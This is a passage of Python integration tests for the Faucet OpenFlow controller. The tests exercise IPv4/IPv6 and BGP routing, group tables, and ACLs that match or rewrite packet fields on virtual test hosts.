self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('10.0.0.1/24')
second_host_net = ipaddress.ip_interface('172.16.0.1/24')
second_host.setIP(str(second_host_net.ip), prefixLen=24)
self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV4.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
self.one_ipv4_ping(first_host, second_host_net.ip)
self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
self.add_host_ipv6_address(second_host, second_host_net)
self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route ::/0 next-hop fc00::1:1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.one_ipv6_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::40:0/112 next-hop fc00::1:254;
route fc00::50:0/112 next-hop fc00::2:2;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
self.verify_ipv6_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv6_routing_mesh()
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::10:2"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::20:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::10:2/112')
first_host_ctrl_ip = ipaddress.ip_address('fc00::10:1')
second_host_ip = ipaddress.ip_interface('fc00::20:2/112')
second_host_ctrl_ip = ipaddress.ip_address('fc00::20:1')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
self.add_host_route(
first_host, second_host_ip, first_host_ctrl_ip)
self.add_host_route(
second_host, first_host_ip, second_host_ctrl_ip)
self.wait_for_route_as_flow(
first_host.MAC(), first_host_ip.network)
self.wait_for_route_as_flow(
second_host.MAC(), second_host_ip.network)
self.one_ipv6_ping(first_host, second_host_ip.ip)
self.one_ipv6_ping(first_host, second_host_ctrl_ip)
self.one_ipv6_ping(second_host, first_host_ip.ip)
self.one_ipv6_ping(second_host, first_host_ctrl_ip)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
- route:
ip_dst: "fc00::30:0/112"
ip_gw: "fc00::1:2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1')
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.verify_ipv6_routing_mesh()
second_host = self.hosts_name_ordered()[1]
self.flap_all_switch_ports()
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
self.verify_ipv6_routing_mesh()
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}, default=0),
0)
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'fc00::1:0/112 next-hop fc00::1:254',
'fc00::10:0/112 next-hop fc00::1:1',
'fc00::20:0/112 next-hop fc00::1:2',
'fc00::30:0/112 next-hop fc00::1:2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
"""Test basic IPv6 routing without BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
"""Test IPv6 routing works."""
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
for _coldstart in range(2):
for _swaps in range(5):
self.verify_ipv6_routing_pair(
first_host, first_host_ip, first_host_routed_ip,
second_host, second_host_ip, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
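"""Test that flood flows use an OpenFlow group when group_table is enabled."""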
CONFIG = """
group_table: True
""" + CONFIG_BOILER_UNTAGGED
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_TAGGED_BOILER
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
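"""Test an ACL that matches on a masked Ethernet source address."""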
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
actions:
allow: 1
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:0d:00:00:00:99')
self.retry_net_ping(hosts=(first_host, second_host))
self.wait_nonzero_packet_count_flow(
{'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
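"""Test ACLs that rewrite the destination MAC with set_fields; switching should follow the rewritten MAC."""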
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2's MAC should appear on the third host, and not the second host,
# as the ACL should rewrite the dst MAC.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2's MAC should appear on the third host, and not the second host,
# as the ACL should rewrite the dst MAC.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
- set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
- set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSCP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and will proceed through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSCP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and will proceed through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
